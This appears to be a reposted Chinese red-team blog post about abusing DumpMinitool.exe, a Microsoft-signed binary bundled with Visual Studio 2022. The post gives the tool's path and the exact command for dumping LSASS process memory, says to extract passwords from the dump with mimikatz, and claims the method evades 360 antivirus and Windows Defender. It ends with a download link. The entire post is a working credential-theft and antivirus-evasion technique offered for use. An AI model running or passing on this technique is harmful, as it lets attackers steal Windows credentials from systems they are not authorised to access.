红队工具 | Visual Studio2022微软白名单免杀dump lsass的免杀工具

渗透技巧 3年前 (2022) admin
1,841 0 0

消息来源推特,推特博主:mr.d0x

https://twitter.com/mrd0x/status/1511415432888131586?s=20&t=twOtT_clemvEYGQ9YdZ02w

可以自行安装Visual Studio2022,然后访问路径,把工具拖出来使用即可,也可以直接在文末获取下载地址


红队工具 | Visual Studio2022微软白名单免杀dump lsass的免杀工具


转储 LSASS,该工具文件路径:

C:Program FilesMicrosoft Visual Studio2022CommunityCommon7IDEExtensionsTestPlatformExtensions

文件名:DumpMinitool.exe

红队工具 | Visual Studio2022微软白名单免杀dump lsass的免杀工具

参数区分大小写

使用命令:

DumpMinitool.exe --file dump.txt --processId xxx --dumpType Full--file 输出的路径--processId lsass.exe进程的ID--dumpType 方式

查看lsass进程ID

红队工具 | Visual Studio2022微软白名单免杀dump lsass的免杀工具

dump完成后,再使用mimikatz进行离线解密即可

红队工具 | Visual Studio2022微软白名单免杀dump lsass的免杀工具

mimikatz

红队工具 | Visual Studio2022微软白名单免杀dump lsass的免杀工具

微软的数字签名

红队工具 | Visual Studio2022微软白名单免杀dump lsass的免杀工具


免杀测试:360和Win10自带的defender杀软均不拦截。


沙箱检测

红队工具 | Visual Studio2022微软白名单免杀dump lsass的免杀工具

微步在线

红队工具 | Visual Studio2022微软白名单免杀dump lsass的免杀工具


红队工具 | Visual Studio2022微软白名单免杀dump lsass的免杀工具


下载地址:


链接:https://pan.baidu.com/s/18IRSjJaM4d2fwjmK9zfQFg

提取码:tfz4


点赞,转发,在看


红队工具 | Visual Studio2022微软白名单免杀dump lsass的免杀工具

原文始发于微信公众号(HACK学习君):红队工具 | Visual Studio2022微软白名单免杀dump lsass的免杀工具

版权声明:admin 发表于 2022年4月12日 下午8:30。
转载请注明:红队工具 | Visual Studio2022微软白名单免杀dump lsass的免杀工具 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...